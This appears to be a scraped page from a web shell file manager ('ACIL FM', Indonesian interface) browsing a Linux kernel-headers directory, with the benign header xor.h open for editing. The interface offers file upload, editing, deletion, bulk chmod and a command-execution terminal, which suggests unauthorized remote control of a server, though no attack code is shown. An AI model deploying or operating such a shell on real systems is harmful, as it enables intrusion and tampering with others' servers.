ACIL FM
Dark
Refresh
Current DIR:
/usr/src/kernels/5.14.0-427.31.1.el9_4.x86_64/include/linux/raid
/
usr
src
kernels
5.14.0-427.31.1.el9_4.x86_64
include
linux
raid
Upload
Zip Selected
Delete Selected
Pilih semua
Nama
Ukuran
Permission
Aksi
detect.h
181 B
chmod
View
DL
Edit
Rename
Delete
pq.h
5.72 MB
chmod
View
DL
Edit
Rename
Delete
xor.h
954 B
chmod
View
DL
Edit
Rename
Delete
Edit file: /usr/src/kernels/5.14.0-427.31.1.el9_4.x86_64/include/linux/raid/xor.h
/* SPDX-License-Identifier: GPL-2.0 */ #ifndef _XOR_H #define _XOR_H #define MAX_XOR_BLOCKS 4 extern void xor_blocks(unsigned int count, unsigned int bytes, void *dest, void **srcs); struct xor_block_template { struct xor_block_template *next; const char *name; int speed; void (*do_2)(unsigned long, unsigned long * __restrict, const unsigned long * __restrict); void (*do_3)(unsigned long, unsigned long * __restrict, const unsigned long * __restrict, const unsigned long * __restrict); void (*do_4)(unsigned long, unsigned long * __restrict, const unsigned long * __restrict, const unsigned long * __restrict, const unsigned long * __restrict); void (*do_5)(unsigned long, unsigned long * __restrict, const unsigned long * __restrict, const unsigned long * __restrict, const unsigned long * __restrict, const unsigned long * __restrict); }; #endif
Simpan
Batal
Isi Zip:
Unzip
Create
Buat Folder
Buat File
Terminal / Execute
Run
Chmod Bulk
All File
All Folder
All File dan Folder
Apply